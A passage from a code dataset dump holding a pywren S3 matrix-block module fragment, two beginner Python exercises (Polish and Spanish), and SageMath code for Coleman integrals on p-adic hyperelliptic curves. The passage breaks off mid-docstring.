blocks):\n bstart_0, bend_0 = block_0\n bstart_1, bend_1 = block_1\n future = executor.submit(self.put_block, bidx_0, bidx_1, X[bstart_0:bend_0, bstart_1:bend_1])\n futures.append(future)\n fs.wait(futures)\n [f.result() for f in futures]\n return 0\n\n\n def get_block(self, block_0, block_1, client=None, flip=False):\n client = boto3.client('s3')\n if (flip):\n block_0, block_1 = block_1, block_0\n s = time.time()\n r = np.random.choice(self.replication_factor, 1)[0]\n key = self.__shard_idx_to_key__(block_0, block_1, r)\n bio = self.__s3_key_to_byte_io__(key)\n e = time.time()\n s = time.time()\n X_block = np.load(bio)\n e = time.time()\n\n if (flip):\n X_block = X_block.T\n return X_block\n\n def put_block(self, block_0, block_1, block):\n\n start_0 = block_0*self.shard_size_0\n end_0 = min(block_0*self.shard_size_0 + self.shard_size_0, self.shape[0])\n shape_0 = end_0 - start_0\n\n start_1 = block_1*self.shard_size_1\n end_1 = min(block_1*self.shard_size_1 + self.shard_size_1, self.shape[1])\n shape_1 = end_1 - start_1\n\n\n if (block.shape != (shape_0, shape_1)):\n raise Exception(\"Incompatible block size: {0} vs {1}\".format(block.shape, (shape_0,shape_1)))\n\n for i in range(self.replication_factor):\n key = self.__get_matrix_shard_key__(start_0, end_0, start_1, end_1, i)\n self.__save_matrix_to_s3__(block, key)\n\n\n def delete_block(self, block_0, 
block_1):\n client = boto3.client('s3')\n\n start_0 = block_0*self.shard_size_0\n end_0 = min(block_0*self.shard_size_0 + self.shard_size_0, self.shape[0])\n shape_0 = end_0 - start_0\n\n start_1 = block_1*self.shard_size_1\n end_1 = min(block_1*self.shard_size_1 + self.shard_size_1, self.shape[1])\n shape_1 = end_1 - start_1\n\n deletions = []\n for i in range(self.replication_factor):\n key = self.__get_matrix_shard_key__(start_0, end_0, start_1, end_1, i)\n deletions.append(client.delete_object(Key=key, Bucket=self.bucket))\n return deletions\n\n","sub_path":"pywren/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":11017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"18166735","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# liczby23.py\n\ndef liczby2():\n \"\"\"\n Funkcja drukuje wszystkie liczby dwucyfrowe, w których cyfry nie powtarzają się. Funkcja zwraca ich liczbę. Wykluczone liczby: 11, 22, 33 itd.\n \"\"\"\n suma = 0\n liczba = 0\n for i in range(1, 10):\n for j in range(0, 10):\n if i != j:\n print(\"{}{} \".format(i, j), end=\"\")\n suma = suma + 1\n print(suma)\n return suma\n\n\ndef main(args):\n print(\"Liczb 2-cyfrowych:\", liczby2())\n return 0\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"python/liczby23/liczby23.py","file_name":"liczby23.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"327539004","text":"# ---diccionarios --\nparticipantes = {\n\t\t\t\t 'Nombre': 'Manuel', \n\t\t\t\t 'Edad' : 20 ,\n\t\t\t\t 'Cursos': ['Python ' , 'React ' , ' Django'],\n\t\t\t\t }\nprint (participantes ['Nombre'])\nprint (participantes ['Edad'])\nprint (participantes ['Cursos'])\n\nparticipantes['telegono'] = 9811031944\nparticipantes['ocupacion'] = 'Developer'\n\nprint(\"==========\")\nprint(participantes)\n\njugador = {}\n\njugador['nickname'] = 'FunrryMonster'\njugador['score'] = 0\n\nprint (jugador)\n\njugador['score'] = 60\nprint(\"El score actual de el jugador \" + jugador ['nickname'] + \" es \" + str (jugador['score']))\n\navengers = {\n\t'cap': {\n\t\t'name': 'Steve',\n\t\t'lastname': 'Roger',\n\t\t'avenger_name':'Capitan America',\n\t\t},\n\t'stark': {\n\t\t'name': 'Anthony Edward',\n\t\t'lastname': 'Stark',\n\t\t'avenger_name':'Iroman',\n\n\t},\n\t'MrGreen' : {\n\t\t'name': 'Bruce',\n\t\t'lastname': 'Banner',\n\t\t'avenger_name':'Hulk',\n\n\t}\t\n\n}\n\nfor username , avenger_info in avengers.items():\n\tprint('\\n Username ' + username )\n\tfullname = avenger_info['name'] + \" \" + avenger_info['lastname']\n\tavenger_name = avenger_info['avenger_name']\n\n\tprint(\"\\t Nombre real \" + fullname)\n\tprint (\"\\t Nombre vengador\" + avenger_name)\n\n","sub_path":"Ejercicio_7.py","file_name":"Ejercicio_7.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"629370990","text":"\"\"\"\nHyperelliptic curves over a `p`-adic field\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2007 Robert Bradshaw \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n# https://www.gnu.org/licenses/\n# 
****************************************************************************\n\n\nfrom sage.rings.all import (PowerSeriesRing, PolynomialRing, ZZ, QQ,\n pAdicField, GF, RR, RationalField, Infinity)\nfrom sage.functions.log import log\nfrom sage.modules.free_module import VectorSpace\nfrom sage.matrix.constructor import matrix, identity_matrix\nfrom sage.modules.free_module_element import vector\n\nfrom sage.schemes.curves.projective_curve import ProjectivePlaneCurve_field\nfrom sage.misc.functional import cyclotomic_polynomial\nfrom sage.functions.other import binomial\n\n\nfrom . import hyperelliptic_generic\n\nclass HyperellipticCurve_padic_field(hyperelliptic_generic.HyperellipticCurve_generic,\n ProjectivePlaneCurve_field):\n\n # The functions below were prototyped at the 2007 Arizona Winter School by\n # Robert Bradshaw and Ralf Gerkmann, working with Miljan Brakovevic and\n # Kiran Kedlaya\n # All of the below is with respect to the Monsky Washnitzer cohomology.\n\n def local_analytic_interpolation(self, P, Q, prec=None):\n \"\"\"\n For points `P`, `Q` in the same residue disc,\n this constructs an interpolation from `P` to `Q`\n (in homogeneous coordinates) in a power series in\n the local parameter `t`, with precision equal to\n the `p`-adic precision of the underlying ring.\n\n INPUT:\n\n - P and Q points on self in the same residue disc\n\n OUTPUT:\n\n Returns a point `X(t) = ( x(t) : y(t) : z(t) )` such that:\n\n (1) `X(0) = P` and `X(1) = Q` if `P, Q` are not in the infinite disc\n (2) `X(P[0]^g/P[1]) = P` and `X(Q[0]^g/Q[1]) = Q` if `P, Q` are in the infinite disc\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n\n A non-Weierstrass disc::\n\n sage: P = HK(0,3)\n sage: Q = HK(5, 3 + 3*5^2 + 2*5^3 + 3*5^4 + 2*5^5 + 2*5^6 + 3*5^7 + O(5^8))\n sage: x,y,z, = HK.local_analytic_interpolation(P,Q)\n sage: x(0) == P[0], x(1) == Q[0], y(0) == P[1], y.polynomial()(1) == Q[1]\n (True, True, True, True)\n\n A finite Weierstrass disc::\n\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: Q = HK.lift_x(1 + 3*5^2)\n sage: x,y,z = HK.local_analytic_interpolation(P,Q)\n sage: x(0) == P[0], x.polynomial()(1) == Q[0], y(0) == P[1], y(1) == Q[1]\n (True, True, True, True)\n\n The infinite disc::\n\n sage: P = HK.lift_x(5^-2)\n sage: Q = HK.lift_x(4*5^-2)\n sage: x,y,z = HK.local_analytic_interpolation(P,Q)\n sage: x = x/z\n sage: y = y/z\n sage: x(P[0]/P[1]) == P[0]\n True\n sage: x(Q[0]/Q[1]) == Q[0]\n True\n sage: y(P[0]/P[1]) == P[1]\n True\n sage: y(Q[0]/Q[1]) == Q[1]\n True\n\n An error if points are not in the same disc::\n\n sage: x,y,z = HK.local_analytic_interpolation(P,HK(1,0))\n Traceback (most recent call last):\n ...\n ValueError: (5^-2 + O(5^6) : 5^-3 + 4*5^2 + 5^3 + 3*5^4 + O(5^5) : 1 + O(5^8)) and (1 + O(5^8) : 0 : 1 + O(5^8)) are not in the same residue disc\n\n TESTS:\n\n Check that :trac:`26005` is fixed::\n\n sage: L = Qp(5, 100)\n sage: HL = H.change_ring(L)\n sage: P = HL.lift_x(1 + 2*5^2)\n sage: Q = HL.lift_x(1 + 3*5^2)\n sage: x,y,z=HL.local_analytic_interpolation(P, Q)\n sage: x.polynomial().degree()\n 98\n\n AUTHORS:\n\n - Robert Bradshaw (2007-03)\n - Jennifer Balakrishnan (2010-02)\n \"\"\"\n if prec == None:\n prec = self.base_ring().precision_cap() + 2\n if not self.is_same_disc(P,Q):\n raise ValueError(\"%s and %s are not in the same residue disc\"%(P,Q))\n disc = self.residue_disc(P)\n t = PowerSeriesRing(self.base_ring(), 't', prec).gen(0)\n if disc == 
self.change_ring(self.base_ring().residue_field())(0,1,0): # Infinite disc\n x,y = self.local_coordinates_at_infinity(2*prec)\n g = self.genus()\n return (x*t**(2*g+1),y*t**(2*g+1),t**(2*g+1))\n if disc[1] != 0: # non-Weierstrass disc\n x = P[0]+t*(Q[0]-P[0])\n pts = self.lift_x(x, all=True)\n if pts[0][1][0] == P[1]:\n return pts[0]\n else:\n return pts[1]\n else: # Weierstrass disc\n S = self.find_char_zero_weier_point(P)\n x,y = self.local_coord(S, prec)\n a = P[1]\n b = Q[1] - P[1]\n y = a + b*t\n x = x.polynomial()(y).add_bigoh(x.prec())\n return (x, y, 1)\n\n def weierstrass_points(self):\n \"\"\"\n Return the Weierstrass points of self defined over self.base_ring(),\n that is, the point at infinity and those points in the support\n of the divisor of `y`\n\n EXAMPLES::\n\n sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: C.weierstrass_points()\n [(0 : 1 + O(11^5) : 0), (7 + 10*11 + 4*11^3 + O(11^5) : 0 : 1 + O(11^5))]\n \"\"\"\n f, h = self.hyperelliptic_polynomials()\n if h != 0:\n raise NotImplementedError()\n return [self((0,1,0))] + [self((x, 0, 1)) for x in f.roots(multiplicities=False)]\n\n def is_in_weierstrass_disc(self, P):\n \"\"\"\n Checks if `P` is in a Weierstrass disc\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK(0,3)\n sage: HK.is_in_weierstrass_disc(P)\n False\n sage: Q = HK(0,1,0)\n sage: HK.is_in_weierstrass_disc(Q)\n True\n sage: S = HK(1,0)\n sage: HK.is_in_weierstrass_disc(S)\n True\n sage: T = HK.lift_x(1+3*5^2); T\n (1 + 3*5^2 + O(5^8) : 2*5 + 4*5^3 + 3*5^4 + 5^5 + 3*5^6 + O(5^7) : 1 + O(5^8))\n sage: HK.is_in_weierstrass_disc(T)\n True\n\n AUTHOR:\n\n - Jennifer Balakrishnan (2010-02)\n \"\"\"\n return not (P[1].valuation() == 0 and P != self(0, 1, 0))\n\n def is_weierstrass(self, P):\n \"\"\"\n Checks if `P` is a Weierstrass point (i.e., fixed by the hyperelliptic involution)\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK(0,3)\n sage: HK.is_weierstrass(P)\n False\n sage: Q = HK(0,1,0)\n sage: HK.is_weierstrass(Q)\n True\n sage: S = HK(1,0)\n sage: HK.is_weierstrass(S)\n True\n sage: T = HK.lift_x(1+3*5^2); T\n (1 + 3*5^2 + O(5^8) : 2*5 + 4*5^3 + 3*5^4 + 5^5 + 3*5^6 + O(5^7) : 1 + O(5^8))\n sage: HK.is_weierstrass(T)\n False\n\n AUTHOR:\n\n - Jennifer Balakrishnan (2010-02)\n \"\"\"\n return (P[1] == 0 or P[2] == 0)\n\n def find_char_zero_weier_point(self, Q):\n \"\"\"\n Given `Q` a point on self in a Weierstrass disc, finds the\n center of the Weierstrass disc (if defined over self.base_ring())\n\n EXAMPLES::\n\n sage: R. 
<x> 
= QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: Q = HK.lift_x(5^-2)\n sage: S = HK(1,0)\n sage: T = HK(0,1,0)\n sage: HK.find_char_zero_weier_point(P)\n (1 + O(5^8) : 0 : 1 + O(5^8))\n sage: HK.find_char_zero_weier_point(Q)\n (0 : 1 + O(5^8) : 0)\n sage: HK.find_char_zero_weier_point(S)\n (1 + O(5^8) : 0 : 1 + O(5^8))\n sage: HK.find_char_zero_weier_point(T)\n (0 : 1 + O(5^8) : 0)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n if not self.is_in_weierstrass_disc(Q):\n raise ValueError(\"%s is not in a Weierstrass disc\"%Q)\n points = self.weierstrass_points()\n for P in points:\n if self.is_same_disc(P,Q):\n return P\n\n def residue_disc(self, P):\n \"\"\"\n Gives the residue disc of `P`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: HK.residue_disc(P)\n (1 : 0 : 1)\n sage: Q = HK(0,3)\n sage: HK.residue_disc(Q)\n (0 : 3 : 1)\n sage: S = HK.lift_x(5^-2)\n sage: HK.residue_disc(S)\n (0 : 1 : 0)\n sage: T = HK(0,1,0)\n sage: HK.residue_disc(T)\n (0 : 1 : 0)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n xPv = P[0].valuation()\n yPv = P[1].valuation()\n F = self.base_ring().residue_field()\n HF = self.change_ring(F)\n if P == self(0,1,0):\n return HF(0,1,0)\n elif yPv > 0:\n if xPv > 0:\n return HF(0,0,1)\n if xPv == 0:\n return HF(P[0].expansion(0), 0,1)\n elif yPv ==0:\n if xPv > 0:\n return HF(0, P[1].expansion(0),1)\n if xPv == 0:\n return HF(P[0].expansion(0), P[1].expansion(0),1)\n else:\n return HF(0,1,0)\n\n def is_same_disc(self, P, Q):\n \"\"\"\n Checks if `P,Q` are in same residue disc\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(1 + 2*5^2)\n sage: Q = HK.lift_x(5^-2)\n sage: S = HK(1,0)\n sage: HK.is_same_disc(P,Q)\n False\n sage: HK.is_same_disc(P,S)\n True\n sage: HK.is_same_disc(Q,S)\n False\n \"\"\"\n return self.residue_disc(P) == self.residue_disc(Q)\n\n def tiny_integrals(self, F, P, Q):\n r\"\"\"\n Evaluate the integrals of `f_i dx/2y` from `P` to `Q` for each `f_i` in `F`\n by formally integrating a power series in a local parameter `t`\n\n `P` and `Q` MUST be in the same residue disc for this result to make sense.\n\n INPUT:\n\n - F a list of functions `f_i`\n - P a point on self\n - Q a point on self (in the same residue disc as P)\n\n OUTPUT:\n\n The integrals `\\int_P^Q f_i dx/2y`\n\n EXAMPLES::\n\n sage: K = pAdicField(17, 5)\n sage: E = EllipticCurve(K, [-31/3, -2501/108]) # 11a\n sage: P = E(K(14/3), K(11/2))\n sage: TP = E.teichmuller(P);\n sage: x,y = E.monsky_washnitzer_gens()\n sage: E.tiny_integrals([1,x],P, TP) == E.tiny_integrals_on_basis(P,TP)\n True\n\n ::\n\n sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(11^(-2))\n sage: Q = C.lift_x(3*11^(-2))\n sage: C.tiny_integrals([1],P,Q)\n (3*11^3 + 7*11^4 + 4*11^5 + 7*11^6 + 5*11^7 + O(11^8))\n\n Note that this fails if the points are not in the same residue disc::\n\n sage: S = C(0,1/4)\n sage: C.tiny_integrals([1,x,x^2,x^3],P,S)\n Traceback (most recent call last):\n ...\n ValueError: (11^-2 + O(11^3) : 11^-5 + 8*11^-2 + O(11^0) : 1 + O(11^5)) and (0 : 3 + 8*11 + 2*11^2 + 8*11^3 + 2*11^4 + O(11^5) : 1 + O(11^5)) are not in the same residue disc\n\n \"\"\"\n x, y, z = 
self.local_analytic_interpolation(P, Q) #homogeneous coordinates\n x = x/z\n y = y/z\n dt = x.derivative() / (2*y)\n integrals = []\n g = self.genus()\n for f in F:\n try:\n f_dt = f(x,y)*dt\n except TypeError: #if f is a constant, not callable\n f_dt = f*dt\n if x.valuation() != -2:\n I = sum(f_dt[n]/(n+1) for n in range(f_dt.degree() + 1)) # \\int_0^1 f dt\n else:\n If_dt = f_dt.integral().laurent_polynomial()\n I = If_dt(Q[0]**g/Q[1]) - If_dt(P[0]**g/P[1])\n integrals.append(I)\n return vector(integrals)\n\n def tiny_integrals_on_basis(self, P, Q):\n r\"\"\"\n Evaluate the integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n by formally integrating a power series in a local parameter `t`.\n `P` and `Q` MUST be in the same residue disc for this result to make sense.\n\n INPUT:\n\n - P a point on self\n - Q a point on self (in the same residue disc as P)\n\n OUTPUT:\n\n The integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n EXAMPLES::\n\n sage: K = pAdicField(17, 5)\n sage: E = EllipticCurve(K, [-31/3, -2501/108]) # 11a\n sage: P = E(K(14/3), K(11/2))\n sage: TP = E.teichmuller(P);\n sage: E.tiny_integrals_on_basis(P, TP)\n (17 + 14*17^2 + 17^3 + 8*17^4 + O(17^5), 16*17 + 5*17^2 + 8*17^3 + 14*17^4 + O(17^5))\n\n ::\n\n sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(11^(-2))\n sage: Q = C.lift_x(3*11^(-2))\n sage: C.tiny_integrals_on_basis(P,Q)\n (3*11^3 + 7*11^4 + 4*11^5 + 7*11^6 + 5*11^7 + O(11^8), 3*11 + 10*11^2 + 8*11^3 + 9*11^4 + 7*11^5 + O(11^6), 4*11^-1 + 2 + 6*11 + 6*11^2 + 7*11^3 + O(11^4), 11^-3 + 6*11^-2 + 2*11^-1 + 2 + O(11^2))\n\n\n Note that this fails if the points are not in the same residue disc::\n\n sage: S = C(0,1/4)\n sage: C.tiny_integrals_on_basis(P,S)\n Traceback (most recent call last):\n ...\n ValueError: (11^-2 + O(11^3) : 11^-5 + 8*11^-2 + O(11^0) : 1 + O(11^5)) and (0 : 3 + 8*11 + 2*11^2 + 8*11^3 + 2*11^4 + O(11^5) : 1 + O(11^5)) are not in the same residue disc\n\n \"\"\"\n d = self.hyperelliptic_polynomials()[0].degree()\n g = self.genus()\n if d%2 == 1:\n dim = 2*g\n else:\n dim = 2*g + 1\n if P == Q:\n V = VectorSpace(self.base_ring(), dim)\n return V(0)\n R = PolynomialRing(self.base_ring(), ['x', 'y'])\n x, y = R.gens()\n return self.tiny_integrals([x**i for i in range(dim)], P, Q)\n\n def teichmuller(self, P):\n r\"\"\"\n Find a Teichm\\:uller point in the same residue class of `P`.\n\n Because this lift of frobenius acts as `x \\mapsto x^p`,\n take the Teichmuller lift of `x` and then find a matching `y`\n from that.\n\n EXAMPLES::\n\n sage: K = pAdicField(7, 5)\n sage: E = EllipticCurve(K, [-31/3, -2501/108]) # 11a\n sage: P = E(K(14/3), K(11/2))\n sage: E.frobenius(P) == P\n False\n sage: TP = E.teichmuller(P); TP\n (0 : 2 + 3*7 + 3*7^2 + 3*7^4 + O(7^5) : 1 + O(7^5))\n sage: E.frobenius(TP) == TP\n True\n sage: (TP[0] - P[0]).valuation() > 0, (TP[1] - P[1]).valuation() > 0\n (True, True)\n \"\"\"\n K = P[0].parent()\n x = K.teichmuller(P[0])\n pts = self.lift_x(x, all=True)\n if (pts[0][1] - P[1]).valuation() > 0:\n return pts[0]\n else:\n return pts[1]\n\n def coleman_integrals_on_basis(self, P, Q, algorithm=None):\n r\"\"\"\n Computes the Coleman integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n INPUT:\n\n - P point on self\n - Q point on self\n - algorithm (optional) = None (uses Frobenius) or teichmuller (uses Teichmuller points)\n\n OUTPUT:\n\n the Coleman integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n EXAMPLES::\n\n 
sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(2)\n sage: Q = C.lift_x(3)\n sage: C.coleman_integrals_on_basis(P, Q)\n (10*11 + 6*11^3 + 2*11^4 + O(11^5), 11 + 9*11^2 + 7*11^3 + 9*11^4 + O(11^5), 3 + 10*11 + 5*11^2 + 9*11^3 + 4*11^4 + O(11^5), 3 + 11 + 5*11^2 + 4*11^4 + O(11^5))\n sage: C.coleman_integrals_on_basis(P, Q, algorithm='teichmuller')\n (10*11 + 6*11^3 + 2*11^4 + O(11^5), 11 + 9*11^2 + 7*11^3 + 9*11^4 + O(11^5), 3 + 10*11 + 5*11^2 + 9*11^3 + 4*11^4 + O(11^5), 3 + 11 + 5*11^2 + 4*11^4 + O(11^5))\n\n ::\n\n sage: K = pAdicField(11,5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(11^(-2))\n sage: Q = C.lift_x(3*11^(-2))\n sage: C.coleman_integrals_on_basis(P, Q)\n (3*11^3 + 7*11^4 + 4*11^5 + 7*11^6 + 5*11^7 + O(11^8), 3*11 + 10*11^2 + 8*11^3 + 9*11^4 + 7*11^5 + O(11^6), 4*11^-1 + 2 + 6*11 + 6*11^2 + 7*11^3 + O(11^4), 11^-3 + 6*11^-2 + 2*11^-1 + 2 + O(11^2))\n\n ::\n\n sage: R = C(0,1/4)\n sage: a = C.coleman_integrals_on_basis(P,R) # long time (7s on sage.math, 2011)\n sage: b = C.coleman_integrals_on_basis(R,Q) # long time (9s on sage.math, 2011)\n sage: c = C.coleman_integrals_on_basis(P,Q) # long time\n sage: a+b == c # long time\n True\n\n ::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: S = HK(1,0)\n sage: P = HK(0,3)\n sage: T = HK(0,1,0)\n sage: Q = HK.lift_x(5^-2)\n sage: R = HK.lift_x(4*5^-2)\n sage: HK.coleman_integrals_on_basis(S,P)\n (2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9), 5 + 2*5^2 + 4*5^3 + 2*5^4 + 3*5^6 + 4*5^7 + 2*5^8 + O(5^9))\n sage: HK.coleman_integrals_on_basis(T,P)\n (2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9), 5 + 2*5^2 + 4*5^3 + 2*5^4 + 3*5^6 + 4*5^7 + 2*5^8 + O(5^9))\n sage: HK.coleman_integrals_on_basis(P,S) == -HK.coleman_integrals_on_basis(S,P)\n True\n sage: HK.coleman_integrals_on_basis(S,Q)\n (4*5 + 4*5^2 + 4*5^3 + O(5^4), 5^-1 + O(5^3))\n sage: HK.coleman_integrals_on_basis(Q,R)\n (4*5 + 2*5^2 + 2*5^3 + 2*5^4 + 5^5 + 5^6 + 5^7 + 3*5^8 + O(5^9), 2*5^-1 + 4 + 4*5 + 4*5^2 + 4*5^3 + 2*5^4 + 3*5^5 + 2*5^6 + O(5^7))\n sage: HK.coleman_integrals_on_basis(S,R) == HK.coleman_integrals_on_basis(S,Q) + HK.coleman_integrals_on_basis(Q,R)\n True\n sage: HK.coleman_integrals_on_basis(T,T)\n (0, 0)\n sage: HK.coleman_integrals_on_basis(S,T)\n (0, 0)\n\n AUTHORS:\n\n - Robert Bradshaw (2007-03): non-Weierstrass points\n - Jennifer Balakrishnan and Robert Bradshaw (2010-02): Weierstrass points\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n from sage.misc.profiler import Profiler\n prof = Profiler()\n prof(\"setup\")\n K = self.base_ring()\n p = K.prime()\n prec = K.precision_cap()\n g = self.genus()\n d = self.hyperelliptic_polynomials()[0].degree()\n if d%2 == 1:\n dim = 2*g\n else:\n dim = 2*g+1\n V = VectorSpace(K, dim)\n #if P or Q is Weierstrass, use the Frobenius algorithm\n if self.is_weierstrass(P):\n if self.is_weierstrass(Q):\n return V(0)\n else:\n PP = None\n QQ = Q\n TP = None\n if Q[1] %p != 0:\n TQ = self.frobenius(Q)\n else:\n T = self.find_char_zero_weier_point(Q)\n return self.coleman_integrals_on_basis(P,T) + self.tiny_integrals_on_basis(T,Q)\n elif self.is_weierstrass(Q):\n PP = P\n QQ = None\n TQ = None\n if P[1] %p != 0:\n TP = self.frobenius(P)\n else:\n T = self.find_char_zero_weier_point(P)\n return 
self.tiny_integrals_on_basis(P,T) + self.coleman_integrals_on_basis(T,Q)\n elif self.is_same_disc(P,Q):\n return self.tiny_integrals_on_basis(P,Q)\n elif P[1] % p == 0:\n T = self.find_char_zero_weier_point(P)\n return self.tiny_integrals_on_basis(P,T) + self.coleman_integrals_on_basis(T,Q)\n elif Q[1] % p == 0:\n T = self.find_char_zero_weier_point(Q)\n return self.coleman_integrals_on_basis(P,T) + self.tiny_integrals_on_basis(T,Q)\n elif algorithm == 'teichmuller':\n prof(\"teichmuller\")\n PP = TP = self.teichmuller(P)\n QQ = TQ = self.teichmuller(Q)\n else:\n prof(\"frobPQ\")\n TP = self.frobenius(P)\n TQ = self.frobenius(Q)\n PP, QQ = P, Q\n prof(\"tiny integrals\")\n if TP is None:\n P_to_TP = V(0)\n else:\n if TP is not None:\n TPv = (TP[0]**g/TP[1]).valuation()\n xTPv = TP[0].valuation()\n else:\n xTPv = TPv = +Infinity\n if TQ is not None:\n TQv = (TQ[0]**g/TQ[1]).valuation()\n xTQv = TQ[0].valuation()\n else:\n xTQv = TQv = +Infinity\n offset = (2*g-1)*max(TPv, TQv)\n if offset == +Infinity:\n offset = (2*g-1)*min(TPv,TQv)\n if (offset > prec and (xTPv <0 or xTQv <0) and (self.residue_disc(P) == self.change_ring(GF(p))(0,1,0) or self.residue_disc(Q) == self.change_ring(GF(p))(0,1,0))):\n newprec = offset + prec\n K = pAdicField(p,newprec)\n A = PolynomialRing(RationalField(),'x')\n f = A(self.hyperelliptic_polynomials()[0])\n from sage.schemes.hyperelliptic_curves.constructor import HyperellipticCurve\n self = HyperellipticCurve(f).change_ring(K)\n xP = P[0]\n xPv = xP.valuation()\n xPnew = K(sum(c * p**(xPv + i) for i, c in enumerate(xP.expansion())))\n PP = P = self.lift_x(xPnew)\n TP = self.frobenius(P)\n xQ = Q[0]\n xQv = xQ.valuation()\n xQnew = K(sum(c * p**(xQv + i) for i, c in enumerate(xQ.expansion())))\n QQ = Q = self.lift_x(xQnew)\n TQ = self.frobenius(Q)\n V = VectorSpace(K,dim)\n P_to_TP = V(self.tiny_integrals_on_basis(P, TP))\n if TQ is None:\n TQ_to_Q = V(0)\n else:\n TQ_to_Q = V(self.tiny_integrals_on_basis(TQ, Q))\n prof(\"mw calc\")\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n prof(\"eval f\")\n R = forms[0].base_ring()\n try:\n prof(\"eval f %s\" % R)\n if PP is None:\n L = [-ff(R(QQ[0]), R(QQ[1])) for ff in forms] ##changed\n elif QQ is None:\n L = [ff(R(PP[0]), R(PP[1])) for ff in forms]\n else:\n L = [ff(R(PP[0]), R(PP[1])) - ff(R(QQ[0]), R(QQ[1]))\n for ff in forms]\n except ValueError:\n prof(\"changing rings\")\n forms = [ff.change_ring(self.base_ring()) for ff in forms]\n prof(\"eval f %s\" % self.base_ring())\n if PP is None:\n L = [-ff(QQ[0], QQ[1]) for ff in forms] ##changed\n elif QQ is None:\n L = [ff(PP[0], PP[1]) for ff in forms]\n else:\n L = [ff(PP[0], PP[1]) - ff(QQ[0], QQ[1]) for ff in forms]\n b = V(L)\n if PP is None:\n b -= TQ_to_Q\n elif QQ is None:\n b -= P_to_TP\n elif algorithm != 'teichmuller':\n b -= P_to_TP + TQ_to_Q\n prof(\"lin alg\")\n M_sys = matrix(K, M_frob).transpose() - 1\n TP_to_TQ = M_sys**(-1) * b\n prof(\"done\")\n if algorithm == 'teichmuller':\n return P_to_TP + TP_to_TQ + TQ_to_Q\n else:\n return TP_to_TQ\n\n coleman_integrals_on_basis_hyperelliptic = coleman_integrals_on_basis\n\n\n# def invariant_differential(self):\n# \"\"\"\n# Returns the invariant differential `dx/2y` on self\n#\n# EXAMPLES::\n#\n# sage: R. 
